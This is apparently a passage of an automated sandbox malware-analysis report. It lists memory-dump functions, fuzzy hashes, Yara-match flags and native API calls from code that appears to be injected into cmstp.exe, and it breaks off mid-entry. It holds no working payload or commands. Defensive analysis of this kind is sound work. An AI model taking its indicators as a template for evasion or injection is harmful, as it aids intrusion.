                                                  • Opcode Fuzzy Hash: 248be6d024d9b6cf30ab4ea81adcba6b3d27e2e3470e0fe668c46e2178c548e5
                                                  • Instruction Fuzzy Hash: BD9002A220140803E24065A95814607000597D0342F51C021A2054559E8AA98C51B175
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9560, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed41424bef473e043596f2e92f4947466107ab9effa613f3f9ae54f6c8d4514f
                                                  • Instruction ID: 9e5466a0d3e72bcf143ac891d9e2fa260734a05a8258c4595c3f6645d12d0ffe
                                                  • Opcode Fuzzy Hash: ed41424bef473e043596f2e92f4947466107ab9effa613f3f9ae54f6c8d4514f
                                                  • Instruction Fuzzy Hash: ED900266221004025245A5A9161450B0445A7D6391391C025F1406594CC6A18865A361
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9A80, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e1ffdf3ef8e1e5d76a82966d3a55a6df0206a40b2920ec242c459113779e992e
                                                  • Instruction ID: 3283f99546ff952abfc18ea677c8ccc4812e0836f5b51c65c9763cc6554395b5
                                                  • Opcode Fuzzy Hash: e1ffdf3ef8e1e5d76a82966d3a55a6df0206a40b2920ec242c459113779e992e
                                                  • Instruction Fuzzy Hash: A390026220144842E24062A95814B0F410597E1342F91C029A4146558CC9958855A761
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F96D0, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 18e51d6dfe86a5d953624cec6e8bdac52371a69dcecd706a87cb3310e6cda11e
                                                  • Instruction ID: 320b8ab112a6c382238d7dbd6e5248420d45dd4475e5cf97a729cdac77710710
                                                  • Opcode Fuzzy Hash: 18e51d6dfe86a5d953624cec6e8bdac52371a69dcecd706a87cb3310e6cda11e
                                                  • Instruction Fuzzy Hash: 3490027220100C42E20061A95414B46000597E0341F51C026A0114658D8695C851B561
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9A10, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a87b286a87d3b6518633f211995eda2f07b3c5a12a76921a818c1e2ba3ad22fa
                                                  • Instruction ID: 775ad670dbdae808bf9249eeb307aaaeb7ba03b8917f0e4267cb0d6004fe51e5
                                                  • Opcode Fuzzy Hash: a87b286a87d3b6518633f211995eda2f07b3c5a12a76921a818c1e2ba3ad22fa
                                                  • Instruction Fuzzy Hash: A890027220140802E20061A95818747000597D0342F51C021A5154559E86E5C891B571
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9610, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0237e89f9fb358252aa03fdbcfe5328325d51c987e8a2fd1ce09b881c93a8692
                                                  • Instruction ID: 23190718bb53d499ba0a4770775a5efa5b8f2109ce770ffda56622c6498dd494
                                                  • Opcode Fuzzy Hash: 0237e89f9fb358252aa03fdbcfe5328325d51c987e8a2fd1ce09b881c93a8692
                                                  • Instruction Fuzzy Hash: 5D90027260500C02E25071A95424746000597D0341F51C021A0014658D87D58A55B6E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9650, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0e1af8b8f7348fd39d2729bc649f056df18b71df24c55a299a1e5a03cc273c49
                                                  • Instruction ID: 039ce595278285400bbb92fb09e3ca865cda6be3efcb80dec237220665e291bd
                                                  • Opcode Fuzzy Hash: 0e1af8b8f7348fd39d2729bc649f056df18b71df24c55a299a1e5a03cc273c49
                                                  • Instruction Fuzzy Hash: 0A90027220504C42E24071A95414A46001597D0345F51C021A0054698D96A58D55F6A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009FA3B0, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7be02a7b2e4986244ea11cf8b319b89c77b98fc67f49f471d7320d388ac1b48c
                                                  • Instruction ID: d3744963c416ea363f239d5a1b3d513eabc34086cdcbf6e987a1fadd67afd54f
                                                  • Opcode Fuzzy Hash: 7be02a7b2e4986244ea11cf8b319b89c77b98fc67f49f471d7320d388ac1b48c
                                                  • Instruction Fuzzy Hash: D790027220144402E24071A9945460B5005A7E0341F51C421E0415558C86958856E261
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009FA710, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3b169501fe4712912b01626d1f062e5857cf780256c34e2d169d06684a9f8f96
                                                  • Instruction ID: b7fa2b670f16051f99d50f8d67b481bd4ce01ca3c15192257b1636cb5f927e3a
                                                  • Opcode Fuzzy Hash: 3b169501fe4712912b01626d1f062e5857cf780256c34e2d169d06684a9f8f96
                                                  • Instruction Fuzzy Hash: F490027230100452E600A6E96814A4A410597F0341B51D025A4004558C85D48861A161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9B00, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 995da8195854d9f72e7e4774c264a33f3ff9ecdeb06639a3cf65c9aff3c23a35
                                                  • Instruction ID: 60665fb960228afb63421be36d89ca9fde4f915eadda5a408e0c4d53d1c984f5
                                                  • Opcode Fuzzy Hash: 995da8195854d9f72e7e4774c264a33f3ff9ecdeb06639a3cf65c9aff3c23a35
                                                  • Instruction Fuzzy Hash: 1190026224100C02E24071A994247070006D7D0741F51C021A0014558D86968965B6F1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9730, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dec5fd1d70ee848e00ddf96fac108ed3cb1053008e5071500cac4d9fe4446b81
                                                  • Instruction ID: a0bdc0ddea6e7fb582531f64f37ff0e694071fd2b2021fa4e8b8729e10a5e51d
                                                  • Opcode Fuzzy Hash: dec5fd1d70ee848e00ddf96fac108ed3cb1053008e5071500cac4d9fe4446b81
                                                  • Instruction Fuzzy Hash: E890026260500802E24071A96428706001597D0341F51D021A0014558DC6D98A55B6E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9770, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6cd3eb016a4fd7a7997d785ae9f2f0f172523dc8f30454286c8acbfe8b2f3c73
                                                  • Instruction ID: 88f517a20eab769bc30b9b9dbf8865d65968543e075ed02b5990a829775e88ed
                                                  • Opcode Fuzzy Hash: 6cd3eb016a4fd7a7997d785ae9f2f0f172523dc8f30454286c8acbfe8b2f3c73
                                                  • Instruction Fuzzy Hash: 8B90026220504842E20065A96418A06000597D0345F51D021A1054599DC6B58851F171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009FA770, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0aed33487e980792f52c83c5ee1743d455b22bc43aad35f5a520c96c1e8369ce
                                                  • Instruction ID: 7e62dd7d33781073a323b4cc15e819f2b2f90fd072f34c2c183dcb075424d31b
                                                  • Opcode Fuzzy Hash: 0aed33487e980792f52c83c5ee1743d455b22bc43aad35f5a520c96c1e8369ce
                                                  • Instruction Fuzzy Hash: A390027620504842E60065A96814A87000597D0345F51D421A041459CD86D48861F161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9760, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf43f47d1a063ceb742e3e6b487cc62f66484422f661c9b3a14c64399cf27cdc
                                                  • Instruction ID: e28c2726284bac82225e8bea6552218c4fc0f09f53051e0f40af720a2001ddea
                                                  • Opcode Fuzzy Hash: bf43f47d1a063ceb742e3e6b487cc62f66484422f661c9b3a14c64399cf27cdc
                                                  • Instruction Fuzzy Hash: 0C90027220100803E20061A96518707000597D0341F51D421A041455CDD6D68851B161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9670, Relevance: .0, Instructions: 2COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction ID: e1560ae298a7156ab064f87fff04349582ecc425a528a40acb59b94e2f6b0a66
                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction Fuzzy Hash:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00A4FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E00A4FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E009FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00A45720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00A45720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                  0x00a4fdda
                                                  0x00a4fde2
                                                  0x00a4fde5
                                                  0x00a4fdec
                                                  0x00a4fdfa
                                                  0x00a4fdff
                                                  0x00a4fe0a
                                                  0x00a4fe0f
                                                  0x00a4fe17
                                                  0x00a4fe1e
                                                  0x00a4fe19
                                                  0x00a4fe19
                                                  0x00a4fe19
                                                  0x00a4fe20
                                                  0x00a4fe21
                                                  0x00a4fe22
                                                  0x00a4fe25
                                                  0x00a4fe40

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A4FDFA
                                                  Strings
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A4FE01
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A4FE2B
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                  • API String ID: 885266447-3903918235
                                                  • Opcode ID: 047f2975765252d463194e3f9cdeb6d97c3b0215f0d9471ecc640299cacd0846
                                                  • Instruction ID: aa175ee76ad20d93205dadc1b6fbb9a5af9205be2f7b8caa8c20ed51bef38ee4
                                                  • Opcode Fuzzy Hash: 047f2975765252d463194e3f9cdeb6d97c3b0215f0d9471ecc640299cacd0846
                                                  • Instruction Fuzzy Hash: A1F0F676640601BFDA201B55DD03F23BB6AEBC5730F244324F628565E2DA62FC2097F0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Analysis Process: cmstp.exe PID: 5596 Parent PID: 3440 cmstp.exeCOMMON

                                                  Executed Functions

                                                  Function 029785CD, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,02973BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02973BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0297861D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID: .z`
                                                  • API String ID: 823142352-1441809116
                                                  • Opcode ID: 5682aaaf0bddb73e1b1c9d2514eefb1d9d1d0cb34aa7f3540d995826817f1ad3
                                                  • Instruction ID: 41fa51a2c93ed11ca4e793e6923b892c1f3130889e4da12799b7af331cc9fa39
                                                  • Opcode Fuzzy Hash: 5682aaaf0bddb73e1b1c9d2514eefb1d9d1d0cb34aa7f3540d995826817f1ad3
                                                  • Instruction Fuzzy Hash: 2901AFB2241108AFCB48CF98DC95EEB77A9FF8C354F158248BA0DD7251C630E811CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 029785D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,02973BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02973BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0297861D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID: .z`
                                                  • API String ID: 823142352-1441809116
                                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                  • Instruction ID: 05cf793b55321ef79d7ed13495decd4251f4dafcef54341242ef0d796ad6a8f5
                                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                  • Instruction Fuzzy Hash: E7F0BDB2200208AFCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630E811CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0297867E, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtReadFile.NTDLL(02973D82,5E972F65,FFFFFFFF,02973A41,?,?,02973D82,?,02973A41,FFFFFFFF,5E972F65,02973D82,?,00000000), ref: 029786C5
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: ab47185789dcdba063c4b682eedd820d6376843b24f41e02eb591ec166db7b76
                                                  • Instruction ID: 38c9ed59e276d343599a600b59d24c3ceac7f3fa00c7a42cfd2cf5ac95bb2121
                                                  • Opcode Fuzzy Hash: ab47185789dcdba063c4b682eedd820d6376843b24f41e02eb591ec166db7b76
                                                  • Instruction Fuzzy Hash: 3EF0A4B2200108AFDB18DF89DC84EEB77A9EF8C754F158248BE1D97241D630E911CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02978680, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtReadFile.NTDLL(02973D82,5E972F65,FFFFFFFF,02973A41,?,?,02973D82,?,02973A41,FFFFFFFF,5E972F65,02973D82,?,00000000), ref: 029786C5
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                  • Instruction ID: 6bd62b9e3a0cf681f04966fe0d0d28b34dc17324aa8d89eb3d17da974d03efe0
                                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                  • Instruction Fuzzy Hash: 96F0A4B2200208AFDB18DF89DC84EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 029787AA, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02962D11,00002000,00003000,00000004), ref: 029787E9
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: f59398515f8775d4932f0878bc3a50ad9d46d7f4c844e3c8cef73cf98d19877b
                                                  • Instruction ID: 83329df9fa84937da913f80fcef0f86c4d8a2655b4f306c988a1b8d3357d7aa0
                                                  • Opcode Fuzzy Hash: f59398515f8775d4932f0878bc3a50ad9d46d7f4c844e3c8cef73cf98d19877b
                                                  • Instruction Fuzzy Hash: 1AF01CB6200208AFDB14DFA9CC84EEB77A9EF98750F158259FE0997241D630E911CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 029787B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02962D11,00002000,00003000,00000004), ref: 029787E9
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                  • Instruction ID: 720950d8375739d9e02398f812bd6390a3c4a7edc35097629e2e93fa0039c0c7
                                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                  • Instruction Fuzzy Hash: B4F015B2200208AFDB18DF89CC80EAB77ADEF88750F118148BE0897241C630F810CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 029786FA, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtClose.NTDLL(02973D60,?,?,02973D60,00000000,FFFFFFFF), ref: 02978725
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: dd024dab1d37b046812b83b44ebdbed4c211e01943ff0e26663237506ce41b42
                                                  • Instruction ID: ea5be7c9f2498519c794f2b1f9a8705bf8ebef1d2786c9b9c0f829af3df68824
                                                  • Opcode Fuzzy Hash: dd024dab1d37b046812b83b44ebdbed4c211e01943ff0e26663237506ce41b42
                                                  • Instruction Fuzzy Hash: 59E086352051147FE710DBB4CC48EDB7F68EF45260F144699B9599B682C130A500C790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02978700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtClose.NTDLL(02973D60,?,?,02973D60,00000000,FFFFFFFF), ref: 02978725
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Offset: 02960000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                  • Instruction ID: d3c2ede6c4ba992c23baa7fdf11012012ed370a213499383cf6e97c1c44184cf
                                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                  • Instruction Fuzzy Hash: CED012752002146BD714EB98CC45E97776DEF44750F154455BA185B241C570F51086E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04689860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 65f188fa55456e9367fcdf89be44f316b7482366b747d5d534c922a7cf2e9a0a
                                                  • Instruction ID: 26c1eabf6b9e0e47bf62a9dd6559060cd93fea0ccd8bdadc9b6c722e45d4c73a
                                                  • Opcode Fuzzy Hash: 65f188fa55456e9367fcdf89be44f316b7482366b747d5d534c922a7cf2e9a0a
                                                  • Instruction Fuzzy Hash: B79002B120100453F51165594605717004D97D0285F91C422A0415558DA6D6DD52B171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04689840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: fe0e0d4f25eb64db682ee9722719f7174310a3c10abe474c9994a1c87ebac751
                                                  • Instruction ID: ba73f3dec77c3b9d888ff2b66cc2ec2c3fba8d63620f645c74d3d63355cbde10
                                                  • Opcode Fuzzy Hash: fe0e0d4f25eb64db682ee9722719f7174310a3c10abe474c9994a1c87ebac751
                                                  • Instruction Fuzzy Hash: 489002A1242041927945B5594505517404EA7E0285791C022A1405950C95A6EC56E671
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04689540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: f8535325eab462cebbe7bacc0057da9c8c3e6a8817a29e58040543fc458df28d
                                                  • Instruction ID: 1233646fcf6475a779d468cb3c0440eb9637f1bded6735864c4ebdb12943fdf9
                                                  • Opcode Fuzzy Hash: f8535325eab462cebbe7bacc0057da9c8c3e6a8817a29e58040543fc458df28d
                                                  • Instruction Fuzzy Hash: 889002A5211000432505A9590705517008E97D5395351C031F1006550CE6A1DC616171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04689910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3b1db7854d936958adb52e1ff8b4bbafae8dcf9cb997fe6f4fef7925b97b8b75
                                                  • Instruction ID: 5a1b989d383c95f204926781e51c7d6bb317b437e1f03f3bf61d03e1787b6ec1
                                                  • Opcode Fuzzy Hash: 3b1db7854d936958adb52e1ff8b4bbafae8dcf9cb997fe6f4fef7925b97b8b75
                                                  • Instruction Fuzzy Hash: B99002F120100442F54075594505756004D97D0345F51C021A5055554E96D9DDD576B5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046895D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1990ad5e70501e3f5814781efd88ba355878d35b75168613c556d0cca34b2d1f
                                                  • Instruction ID: c7fc412560947be56030bb6624cfc94aa254294cdca59688f576ca302196cbe4
                                                  • Opcode Fuzzy Hash: 1990ad5e70501e3f5814781efd88ba355878d35b75168613c556d0cca34b2d1f
                                                  • Instruction Fuzzy Hash: 3B9002E120200043650575594515626404E97E0245B51C031E1005590DD5A5DC917175
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 046899A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: true
                                                  • Associated: 0000000B.00000002.619880933.000000000473B000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.619892122.000000000473F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
